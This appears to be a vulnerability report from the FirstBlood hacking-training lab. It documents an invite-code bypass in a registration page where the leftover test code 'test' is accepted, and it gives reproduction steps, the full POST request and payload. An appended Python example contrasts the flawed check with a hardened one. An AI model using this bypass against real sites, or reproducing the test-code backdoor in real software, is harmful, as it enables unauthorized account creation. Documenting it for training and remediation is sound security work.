FirstBlood-#377 Unique invite code bypass
This issue was discovered on FirstBlood v2



On 2021-10-25, vigilante Level 4 reported:

Description

It is possible to create a new account with the test/test credentials instead of using a unique invite code.

Steps to reproduce

  1. Navigate to services > Doctor login https://87357338e250-vigilante.a.firstbloodhackers.com/login.php
  2. Click on the "register here" URL https://87357338e250-vigilante.a.firstbloodhackers.com/register.php
  3. Use username: test and unique invite code: test, then click on "Secure register".
  4. You'll get a message that you've successfully created an account.

Success! Your account has been created with the following credentials:

Username: test Password: Kpu2K8iIta

POST /register.php HTTP/1.1
Host: 87357338e250-vigilante.a.firstbloodhackers.com
Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: https://87357338e250-vigilante.a.firstbloodhackers.com
Referer: https://87357338e250-vigilante.a.firstbloodhackers.com/register.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Pragma: no-cache
Cache-Control: no-cache
Te: trailers
Connection: close

action=register&username=test&inviteCode=test

Impact:

It is possible to bypass the unique code requirement; it looks like some test credentials made it to production, and we can use the word "test" when creating new accounts.

P3 Medium

Endpoint: /register.php

Parameter: inviteCode=

Payload: test


FirstBlood ID: 24
Vulnerability Type: Auth issues

The old invite code was deleted, but when testing FirstBlood v2 the developers accidentally left the test code working.
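The root cause above is a leftover test branch in the invite-code check. The following is an added example (not FirstBlood's own code; the function names, the hashed code store and the sample codes are assumptions) that places the flawed check beside a hardened one where codes are issued randomly, stored hashed, compared in constant time and consumed on first use, so a literal "test" value is never accepted:

```python
import hashlib
import hmac
import secrets

# Constructed store of issued invite codes: sha256(code) -> who redeemed it (None = unused).
ISSUED_CODES = {}


def _digest(code: str) -> str:
    return hashlib.sha256(code.encode()).hexdigest()


def issue_invite_code() -> str:
    """Mint a fresh single-use code and record only its hash."""
    code = secrets.token_urlsafe(16)
    ISSUED_CODES[_digest(code)] = None
    return code


def register_vulnerable(username: str, invite_code: str, valid_codes: set) -> bool:
    # Mirrors the reported behaviour: a leftover test code is accepted
    # unconditionally, so the "unique invite" requirement can be bypassed.
    return invite_code == "test" or invite_code in valid_codes


def register_hardened(username: str, invite_code: str) -> bool:
    """Accept only an issued, not-yet-used code; no environment-specific shortcuts."""
    digest = _digest(invite_code)
    match = None
    # Walk every stored hash with a constant-time compare and no early exit,
    # so response timing does not reveal how close a guess was.
    for stored in ISSUED_CODES:
        if hmac.compare_digest(stored, digest):
            match = stored
    if match is None or ISSUED_CODES[match] is not None:
        return False
    ISSUED_CODES[match] = username  # consume the code: second use is refused
    return True


def run_demo() -> dict:
    """Exercise both checks with the report's payload and a real single-use code."""
    code = issue_invite_code()
    return {
        "vulnerable_accepts_test": register_vulnerable("test", "test", set()),
        "hardened_rejects_test": not register_hardened("test", "test"),
        "hardened_accepts_issued": register_hardened("alice", code),
        "hardened_refuses_reuse": not register_hardened("bob", code),
    }
```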